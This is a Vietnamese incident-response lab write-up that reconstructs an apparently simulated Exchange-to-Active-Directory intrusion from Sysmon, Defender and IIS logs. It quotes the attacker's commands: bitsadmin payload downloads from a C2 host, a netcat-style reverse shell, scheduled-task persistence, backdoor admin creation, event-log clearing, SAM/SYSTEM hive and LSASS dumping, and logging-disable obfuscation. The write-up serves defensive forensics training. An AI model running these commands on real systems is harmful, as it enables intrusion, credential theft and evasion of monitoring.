# NCS LAB Bài lab này được thự hiện bởi Nguyễn Anh Quyền. Tool mình sử dụng chính trong bài lab này là ELEX( Event Log Explorer). Bài lab bao gồm 2 folder chính: * AD-10.11.121.21: Đây có thể là máy chủ Active Directory nơi lưu trữ các thông tin về user, group, chính sách bảo mật, quyền truy cập,... * Exchange: Đây có thể là máy chủ Email có thể có hành vi phishing, file hoặc macro độc hại, các script được thực thi,... Hãy bắt đầu trả lời các câu hỏi được đặt ra. ## 1. Hãy liệt kê các hành vi được thực hiện bởi attacker theo mốc thời gian Theo đề bài, với 2 folder log của 2 máy chủ, ta có thể dự đoán luồng tấn công như sau: * Với exchange server với IIS log có vẻ như đây là mục tiêu đầu tiêu của attacker, kẻ tấn công từ đây có thể lấy được các thông tin về quyền truy cập, quản trị -> qua đó leo thang đặc quyền đến máy chủ Active Directory ### Exchange Log * Lúc 2022-12-20 11:53:14.041 + 2022-12-20 11:53:46.052 : Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi bất thường, User BLUE\Administrator thực hiện tiến trình mở Notepad.exe với file ConsoleHost_history.txt. Đây là file log được tạo thông qua PSReadLine, lưu lại các lệnh đã được thực thi, đây có thể là hành vi xóa log của kẻ tấn công. * Lúc 2022-12-21 04:34:48.660:Event ID 1 - Process Created: Ghi nhận hành vi bất thường với high privileged user NT AUTHORITY\SYSTEM, tạo tiến trình powershell với các params bất thường: * -nop: bỏ qua hồ sơ powershell -> tránh giám sát * -w hidden: Chạy ở chế độ ẩn, không hiện cửa sổ * -noni: chế độ không tương tác * Command thực thi sử dụng obfuscation code -> che dấu hành vi bất thường.   * Phân tích sâu hơn với obfuscation code: * Cấu trúc khởi động tiến trình và chọn phiên bản Powershell phù hợp. * Xây dựng các chuỗi cấu hình tắt log **$zaw7 = (('Ena{2}l{3}Script{1}lo c{4}{0}nvoc ation{5}ogging') -f 'I','B','b','e','k','L')** hay **EnableScriptBlockInvocationLogging** * **$zzBlP = (('Ena{0}l' + 'e{3}crip{1}B' + 'loc{2}L' + 'o' + 'g' + 'ging') -f 'b','t','k','S')** hay **EnableScriptBlockLogging** * Giải nén và thực thi payload ẩn, v.v... * Đây là các hành vi thực hiện các kĩ thuật Defense Evasion(Tránh bị phát hiện) * Lúc 2022-12-21 04:34:49.493: Event ID 1 - Process Created: Tiến trình này sinh từ process chạy powershell trước (processId 9284), cũng thực hiện các hành vi với mục đích Defense Evasion (Tránh bị phát hiện). * Lúc 2022-12-21 04:34:52.179: Event ID 1 - Process Created: Ghi nhạn hành vi chạy attrib.exe (lệnh thay đổi thuộc tính tệp) với file fhoW21Rp7Hhe.aspx, loại bỏ thuộc tính read-only của file, nhằm thực hiện hành vi ghi đè, chỉnh sửa hoặc xóa file. * Lúc 2022-12-21 04:35:23.097: Event ID 1 - Process Created: Ghi nhận hành vi chạy systeminfo từ cmd.exe -> Đây là hành vi reconnaissance (điều tra thông tin) hệ thống. Nhằm lấy thông tin hệ thống để thực hiện các Lateral Movement.  * Lúc 2022-12-21 04:39:52.741: Event ID 1 - Process Created: Ghi nhận hành vi chạy process whoami nhằm hiển thị người dùng hiện tại đang login. (**Reconnaissance**) * Lúc 2022-12-21 04:42:52.020: Event ID 1 - Process Created: Ghi nhận hành vi chạy command ipconfig /all nhằm hiển thị cấu hình mạng của hệ thống. (**Reconnaissance**) * Lúc 2022-12-21 04:43:23.044: Event ID 1 - Process Created: Ghi nhận thêm hành vi chạy command arp -a nhằm hiển thị danh sách địa chỉ IP và địa chỉ MAC (địa chỉ vật lý) của các thiết bị đang giao tiếp với máy tính. * Lúc 2022-12-21 04:44:14.003: Event ID 1 - Process Created: Ghi nhận hành vi chạy command netstat -ano dùng để hiển thị danh sách tất cả các kết nối mạng hiện tại, kèm theo địa chỉ IP, cổng, trạng thái kết nối và PID (Process ID). * Lúc 2022-12-21 04:45:22.643: Event ID 1 - Process Created: Ghi nhận hành vi chạy command nbtstat -A 10.11.121.21 -> dùng để truy vấn thông tin NetBIOS của máy 10.11.121.21 -> kẻ tấn công có thể đang tìm kiếm phương thức để đột nhập vào máy chủ này * Lúc 2022-12-21 04:47:10.176: Event ID 1 - Process Created: Ghi nhận hành vi sử dụng bitsadmin (service dùng để tải tài nguyên từ trên mạng) để tải xuống file UpdateAgent.exe từ C2 server có IP là **192.168.1.13** -> đây là một chương trình mã độc hiển thị dưới dạng một agent với job update để đánh lừa người dùng * Lúc 2022-12-21 04:50:30.285: Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi tải file updatecsp.bat sử dụng bitsadmin từ C2 server với IP **192.168.1.13** -> tương tự file .exe được tải xuống trước đó, file .bat này cũng là file mã độc được tải về giả dạng là tiến trình update. * Lúc 2022-12-21 04:53:10.315: Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi tải file SecurityUpdate.vbs sử dụng bitsadmin từ C2 server với IP **192.168.1.13** -> tương tự file .exe được tải xuống trước đó, file .vbs này cũng là file mã độc được tải về giả dạng là tiến trình update. (file vbs là file script thực thi của Windows liên quan đến các tiến trình thực thi tự động, được lập lịch) * Lúc 2022-12-21 04:54:18.646: Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi tải file mmd.exe sử dụng bitsadmin từ C2 server với IP **192.168.1.13**, đây cũng là file mã độc được tải về giả dạng là file hệ thống  * Lúc 2022-12-21 04:55:52.567: Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi tải file md5.exe sử dụng bitsadmin từ C2 server với IP **192.168.1.13**, đây cũng là file mã độc được tải về giả dạng là file hệ thống.  * Lúc 2022-12-21 06:38:31.048: Event ID 1 - Process Created: Ghi nhận hành vi mở file SecurityUpdate.vbs sử dụng notepad++. * Lúc 2022-12-21 06:38:51.650: Event ID 1 - Process Created: Ghi nhận hành vi mở file updatecsp.bat sử dụng notepad++. * Lúc 2022-12-21 06:38:51.650: Event ID 1 - Process Created: Ghi nhận hành vi sử dụng tiến trình schtasks.exe để tạo tiến trình lập lịch chạy script SecurityUpdate.vbs mỗi khi người dùng đăng nhập với command **SCHTASKS /CREATE /TN "UpdateTasks\SecurityUpdate" /TR "C:\Windows\System32\SecurityUpdate.vbs" /ru interactive /sc onlogon /f**. Hành vi này nhằm duy trì quyền truy cập tới máy chủ đang bị xâm nhập.  * Lúc 2022-12-21 06:38:51.650: Event ID 1 - Process Created: Ghi nhận hành vi sử dụng tiến trình schtasks.exe để tạo tiến trình lập lịch hàng giờ, bắt đầu từ 00:00 sử dụng file mmd.exe với command **schtasks /create /sc hourly /st 00:00 /tn "UpdateTasks\MmdUpdatez" /tr "C:\Windows\System32\mmd.exe"**. Hành vi này nhằm duy trì quyền truy cập tới máy chủ đang bị xâm nhập.  * Lúc 2022-12-21 06:43:50.109: Event ID 1 - Process Created: Ghi nhận tiến trình **updatecsp.bat** được khởi chạy với Parent process là **C:\Windows\System32\WScript.exe "C:\Windows\System32\SecurityUpdate.vbs"**.  * Lúc 2022-12-21 06:43:50.747: Event ID 1 - Process Created: Ghi nhận tiến trình chạy command **UpdateAgent.exe 10.11.121.23 4448 -e cmd.exe**. Đây có thể là script tạo Reverse shell qua đó kết nối ngược lại máy chủ của kẻ tấn công với IP 10.11.121.23 thông qua port 4448. Sau khi kết nối shell thì attacker có thể thực hiện các lệnh trên máy của nạn nhân.  * Lúc 2022-12-21 06:45:00.597: Event ID 1 - Process Created: Ghi nhận hành vi mở file Config Exchange.txt bằng notepad. File này có thể bao gồm các thông tin liên quan đến cấu hình Microsoft Exchange Server. Đây là hành vi khai thác thông tin của Exchange Server để tìm kiếm thông tin máy chủ trong hệ thống. * Lúc 2022-12-21 06:45:19.610: Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi thực thi command **whoami** để display thông tin của user đang đăng nhập. * Lúc 2022-12-21 06:45:45.694: Event ID 1 - Process Created: Ghi nhận hành vi chạy command **net user /domain** để hiển thị danh sách tất cả tài khoản người dùng trong miền (domain) mà máy tính đang kết nối. * Lúc 2022-12-21 06:47:11.011: Event ID 1 - Process Created: Ghi nhận hành vi chạy command **net user adminweb Pass1234 /add** nhằm thêm một tài khoản không hợp lệ (user: adminweb/ password: Pass1234) * Lúc 2022-12-21 06:47:29.823: Event ID 1 - Process Created: Ghi nhận hành vi chạy command **net localgroup administrators adminweb /add** nhằm thêm user vừa tạo vào group Administrators. Nên user được attacker tạo (**adminweb**) đã có được quyền quản trị hệ thống. * Lúc 2022-12-21 06:51:52.740: Event ID 1 - Process Created: Ghi nhận hành vi thực hiện command **cmd /c C:\Windows\System32\mmd.exe** với quyền administrator. * Lúc 2022-12-21 06:58:17.700: Event ID 1 - Process Created: Ghi nhận hành vi chạy command **wevetutil cl Security**. Đây là câu lệnh sử dụng để xóa Win Event Log nhằm che giấu hành vi compromise hệ thống. * Lúc 2022-12-21 06:59:27.357: Event ID 1 - Process Created: Ghi nhận hành vi thực thi command net use E: \\192.168.1.11\C$ /user:Administrator Password@123. Nhằm kết nối ổ đĩa E: tới shared folder C$ của máy có địa chỉ IP **192.168.1.11** (user: Administrator/ password: Password@123). * Lúc 2022-12-21 06:59:53.780: Event ID 1 - Process Created: Ghi nhận hành vi thực thi command net use E: \\10.11.121.21\C$ /user:Administrator Password@123. Nhằm kết nối ổ đĩa E: tới shared folder C$ của máy có địa chỉ IP **10.11.121.21** (user: Administrator/ password: Password@123). * Lúc 2022-12-21 07:00:37.676: Event ID 1 - Process Created: Tiếp tục ghi nhận hành vi thực thi command net use E: \\10.11.121.21\C$ /user:Administrator Password@123. Nhằm kết nối ổ đĩa E: tới shared folder C$ của máy có địa chỉ IP **10.11.121.21** (user: Administrator/ password: Password@123). * Lúc 2022-12-21 07:00:58.127: Event ID 1 - Process Created: Ghi nhận hành vi thực thi command **wmic /node:192.168.1.11 /user:Blue\Administrator /password:Password@123 process call create "reg save hklm\sam C:\sam"**. Hành vi này nhằm trích xuất khóa SAM (Security Account Manager) của máy có địa chỉ IP **192.168.1.11** vào **C:\SAM** (user: Blue\Administrator/ password: Password@123). * Lúc 2022-12-21 07:01:25.822: Event ID 1 - Process Created: Ghi nhận hành vi tương tự, thực thi command **wmic /node:10.11.121.21 /user:Blue\Administrator /password:Password@123 process call create "reg save hklm\sam C:\sam"**. Hành vi này nhằm trích xuất khóa SAM (Security Account Manager) của máy có địa chỉ IP **10.11.121.21** vào **C:\SAM** (user: Blue\Administrator/ password: Password@123) * Lúc 2022-12-21 07:03:21.815: Event ID 1 - Process Created: Ghi nhận hành vi tương tự, thực thi command **wmic /node: 10.11.121.21 /user:Blue\Administrator /password:Password@123 process call create "reg save hklm\system C:\system""** nhằm trích xuất khóa SYSTEM, qua đó sử dụng một số tools để bẻ khóa mật khẩu.  #### BONUS PART * Sau khi trace xong được những hành vi của user này trên log exchange, em muốn tìm thêm xem những file .exe, .bat, .vbs mà kẻ tấn công đã drop vào máy thực hiện những hành vi gì. Nên em sẽ trace thêm log Sysmon đối với những hành vi này: * Đối với các file UpdateAgent.exe, updatecsp.bat, SecurityUpdate.vbs thì ta đã rõ hành vi trong phần trace trước đó * Đối với file **mmd.exe** lúc 2022-12-21 06:56:55.320: Event ID 11 - File Created: Ghi nhận hành vi access **lsass.dmp** tại Path: **C:\Windows\System32\inetsrv\lsass.dmp.** Đây là bản sao bộ nhớ (memory dump) của tiến trình LSASS (Local Security Authority Subsystem Service). LSASS chịu trách nhiệm xác thực người dùng, lưu trữ và quản lí hash mật khẩu của các tài khoản login -> Đây là hành vi đánh cắp thông tin bảo mật. (**Credentials Dumping**). * Chưa ghi nhận hành vi bất thường nào khác của file md5.exe * Ngoài ra, em có thực hiện kiểm tra các log của Windows Defender trên máy Exchange và ghi nhận được một số offense: * Ghi nhận **UpdateAgent.exe** là **HackTool:Win32/RemoteAdmin!MSR** * Ghi nhận file với path: **C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\f0CKClmi2uXi.aspx** là **Exploit:Win32/CVE-2021-31207.B** ### AD-10.11.121.21 Log Sau khi trace log ở máy chủ Exchange, chúng ta đã biết máy chủ **10.11.121.21** là một trong những máy chủ đã bị đánh cắp thông tin đăng nhập. Tiếp tục kiểm tra log trên máy chủ **AD@10.11.121.21** dựa trên timeline của máy Exchange, chúng ta đã biết rõ khoảng thời gian kẻ tấn công **backup hive registry** * Lúc 2022-12-21 07:01:15.992: Event ID 1 - Process Created: Ghi nhận hành vi thực thi command **reg save hklm\sam C:\sam** với Parent process là WmiPrvSE.exe (Vì đây là một command được thực hiện từ xa qua WMI mà ta đã trace được trên máy chủ Exchange). * Lúc 2022-12-21 07:01:25.895: Event ID 1 - Process Created: Ghi nhận hành vi thực thi command **reg save hklm\system C:\system** với Parent process là WmiPrvSE.exe (Vì đây là một command được thực hiện từ xa qua WMI mà ta đã trace được trên máy chủ Exchange). ### IIS Log Sau khi thực hiện truy vấn log trên các máy chủ, em muốn trace thêm các log của **IIS**(Internet Information Services). Khả năng Entry Point của kẻ tấn công ở đây là rất cao. * Em có ghi nhận hành vi NMAP với máy 10.11.121.22 từ máy 10.11.121.23. Đây là hành vi dò tìm các ports của máy chủ trên, nhằm mục đích compromise máy chủ * Sau đó ghi nhận rất nhiều req lạ từ source IP: **10.11.121.23** đã scan nmap. Các req đều get hoặc post với path **/Autodiscover/autodiscover.json** đều trả ra response code 200 (request thành công). Với path đằng sau gọi powershell và các đoạn code đằng sau đã được mã hóa->Sau khi OSINT, đây có thể là lỗ hỗng SSRF liên quan đến CVE-2022-41040 (Autodiscover Endpoint) và CVE-2022-41082 (Microsoft Exchange Server - Remote Code Execution Vulnerability)  -> Đây là entry point của user ## 2. Chỉ ra các IP của attacker, IP máy chủ đã bị tấn công và chỉ ra luồng tấn của attacker. ### Attacker's IPs: * **192.168.1.13**: Server attacker sử dụng để tải xuống các file mã độc * **10.11.121.23**: Máy chủ thực hiện các request liên quan đến scan nmap, ssrf, kết nối cmd thực hiện command từ source này. * **192.168.11.51**: Source IP login vào các tài khoản bị compromise, thực thi các hành vi độc hại từ explorer. ### Server's IPs: * **10.11.121.21**: Server AD bị attacker backup registry trích xuất khóa SAM, SYSTEM * **192.168.1.11**: Server thuộc hệ thống bị attacker backup registry trích xuất khóa SAM, SYSTEM * **10.11.121.22**: Máy chủ Exchange, nơi attacker thực hiện Initial Access. ### Luồng tấn công của Attacker: #### Step 1: Autodiscover Endpoint (CVE-2022-41040) * Attacker sử dụng lỗ hổng SSRF để truy cập vào các endpoint nội bộ máy chủ Exchange * Lỗ hổng này cho phép kẻ tấn công có quyền truy cập hợp lệ vào Exchange Server thực hiện các yêu cầu HTTP độc hại để truy cập các API nội bộ của server\ #### Step 2: Microsoft Exchange Server - Remote Code Execution Vulnerability (CVE-2022-41082) * Sau khi khai thác SSRF để truy cập endpoint PowerShell, Attacker tiếp tục tận dụng lỗ hổng này nhằm chạy mã độc trên hệ thống. Sau đó tiếp tục cài đặt các công cụ nguy hiểm như WebShell, RCE hoặc phần mềm độc hại như CoinMiner, Ransonware,... * Khi đã xâm nhập thành công vào Exchange Server, Attacker trích xuất các dữ liệu quan trọng để tiếp tục di chuyển ngang (Lateral Movement) sang các máy chủ trong hệ thống. * Tạo user mới, add vào các group quản trị để kiểm soát hệ thống. ## 3. Chỉ ra các tài khoản bị compromise bởi attacker? * Tài khoản WEB-SERVER\Administrator được đăng nhập vào Máy chủ Exchange lúc 12/21/2022 7:55:51 AM với logon type 10 từ src IP: **192.168.11.51**  * Tài khoản BLUE\Administrator được đăng nhập vào máy chủ AD lúc 12/21/2022 8:09:11 PM  ## 4. Chỉ ra các file được attacker drop lên máy chủ. * **UpdateAgent.exe** * **updatescp.bat** * **SecurityUpdate.vbs** * **mmd.exe** * **md5.exe** ## 5. Có dữ liệu, thông tin nhạy cảm nào đã bị lộ lọt hay không? * File lsass.dmp trên máy chủ AD@10.11.121.21  * Các registry hive như SAM, SYSTEM trên các máy chủ **10.11.121.21**, **192.168.1.11** bị attacker backup ## 6. Lỗ hổng bảo mật hay điểm yếu nào đã bị lạm dụng để tấn công? * Lỗ hỗng SSRF liên quan đến CVE-2022-41040 (Autodiscover Endpoint) và CVE-2022-41082 (Microsoft Exchange Server - Remote Code Execution Vulnerability) ## 7. Vẽ lại luồng tấn công